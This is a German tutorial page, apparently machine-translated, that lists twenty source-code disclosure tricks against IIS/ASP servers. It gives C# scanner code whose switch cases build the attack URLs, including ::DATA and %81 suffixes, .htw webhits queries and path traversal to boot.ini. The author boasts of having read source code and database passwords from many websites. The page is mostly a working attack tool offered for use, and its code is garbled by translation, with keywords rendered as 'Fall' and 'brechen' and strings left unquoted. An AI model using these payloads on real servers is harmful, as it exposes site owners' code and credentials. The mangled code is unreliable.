Startseite>Tutorial zur Netzwerkprogrammierung>ASP-Tutorial

20 Methoden und Tools zum Anzeigen von ASP -Programmquellcode

Autor:Eve Cole Aktualisierungszeit:2025-03-13 14:32:01

Wie wir alle wissen, hat die Windows -Plattform viele Lücken, Patches sind nacheinander, aber es reicht immer nicht aus, dies auszugleichen. Ich habe die 20 Methoden über den ASP -Quellcode zusammengefasst und eine Anwendung in C# geschrieben, um diese Schwachstellen zu scannen. In den letzten zwei Tagen habe ich den Quellcode vieler Websites, einschließlich Datenbankkennwörter, wirklich gesehen. zur Datenbank und tun Sie, was Sie wollen. Listen Sie zunächst diese 20 Methoden unten auf:

.

%81

::DATEN

%2e

%2e%41sp

+.htr

//

Longhtr

.bak

CodeBrws.asp

showcode.asp

null.htw

qfullhit.htw

qsumrhit.htw

query.idq

Suche/qfullhit.htw

Suche/qsumrhit.htw

Iirturnh.htw

.htw

Übersetzen: f

Die ersten 10 der oben genannten Schwachstellen werden direkt in die ASP -Datei hinzugefügt, z. B. %81 ist XXX. : F -Methode ist nicht direkt über den Browser verfügbar Laden Sie alles von meiner Website herunter.

Switch (this.cbomethod.selectedIndex)

{

Fall 0: // direkt lesen

StrrequestFile = StrServer + Sturl;

brechen;

Fall 5: //%2e%41sp

StrrequestFile = StrServer + Strpath + Strfirst

+ %2e %41sp;

brechen;

Fall 8: // longhtr

StrrequestFile = StrServer + Sturl

+ +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.HTR;

brechen;

Fall 10: //codeBrws.asp

StrrequestFile = StrServer + /iisSamples/exair/howitworks/codeBrws.asp?source=

+ streurl;

brechen;

Fall 11: //showcode.asp

StrrequestFile = StrServer + /iisSamples/exair/howitworks/codeBrws.asp?source=

+ /msadc/../../../boot.ini;

brechen;

Fall 12: //null.htw

StrrequestFile = StrServer + /Null.htw?ciwebhitsFile=

+ streurl + %20 & cirestriktion = keine & cihilitetype = voll;

brechen;

Fall 13: //qfullhit.htw

StrrequestFile = StrServer + /iisSamples/issamples/oop/qfullhit.htw?

+ CiwebhitsFile =/../../boot.ini & cirestriction = Keine

+ & Cihilitetype = full;

brechen;

Fall 14: //qsumrhit.htw

StrrequestFile = StrServer + /iisSamples/issamples/oop/qsumrhit.htw?

+ CiwebhitsFile =/../../boot.ini & cirestriction = Keine

+ & Cihilitetype = full;

brechen;

Fall 15: //query.idq

StrrequestFile = StrServer + /query.idq?citemplate=/../../boot.ini

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.htx;

brechen;

Fall 16: //search/qfullhit.htw

StrrequestFile = StrServer + /iisSamples/exair/search/qfullhit.htw?

+ CiwebhitsFile =/../../boot.ini & cirestriction = Keine

+ & Cihilitetype = full;

brechen;

Fall 17: // suche/qsumrhit.htw

StrrequestFile = StrServer + /iisSamples/exair/search/qsumrhit.htw?

+ CiwebhitsFile =/../../boot.ini & cirestriction = Keine

+ & Cihilitetype = full;

brechen;

Fall 18: //iirturnh.htw

StrrequestFile = StrServer + /iishelp/iis/misc/iirturnh.htw?

+ CiwebhitsFile =/../../boot.ini & cirestriction = Keine

+ & Cihilitetype = full;

brechen;

Fall 19: //.htw

StrrequestFile = StrServer + Sturl

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%.htw?

+ CiwebhitsFile =/../../boot.ini & cirestriction = Keine

+ & Cihilitetype = full;

brechen;

Standard:

strRequestFile = strServer + stRURL + this.cbomethod.text;

}

Ähnliche Artikel